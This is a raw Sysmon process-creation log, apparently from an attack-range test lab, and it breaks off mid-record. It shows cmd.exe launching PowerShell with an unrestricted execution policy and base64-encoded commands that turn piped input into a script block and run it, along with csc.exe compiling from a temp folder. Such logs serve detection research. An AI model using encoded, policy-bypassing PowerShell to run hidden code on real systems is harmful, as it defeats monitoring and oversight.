"c:\Users\Administrator\AppData\Local\Temp\CSC387BF46D2D847B3BAA59F62799988C0.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{A8622C2F-3DC5-6078-CE02-00000000AD01}3964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qidwcgrf.cmdline" 154100x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:09.155{A8622C2F-3DC5-6078-CE02-00000000AD01}3964C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\qidwcgrf.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.702{A8622C2F-3DC4-6078-CD02-00000000AD01}628C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 154100x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.557{A8622C2F-3DC4-6078-CC02-00000000AD01}2180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC4-6078-CB02-00000000AD01}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.421{A8622C2F-3DC4-6078-CB02-00000000AD01}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{A8622C2F-3DC4-6078-8EC8-0F0000000000}0xfc88e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{A8622C2F-3DC4-6078-CA02-00000000AD01}1312C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 154100x8000000000000000227Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:21:08.414{A8622C2F-3DC4-6078-CA02-00000000AD01}1312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGM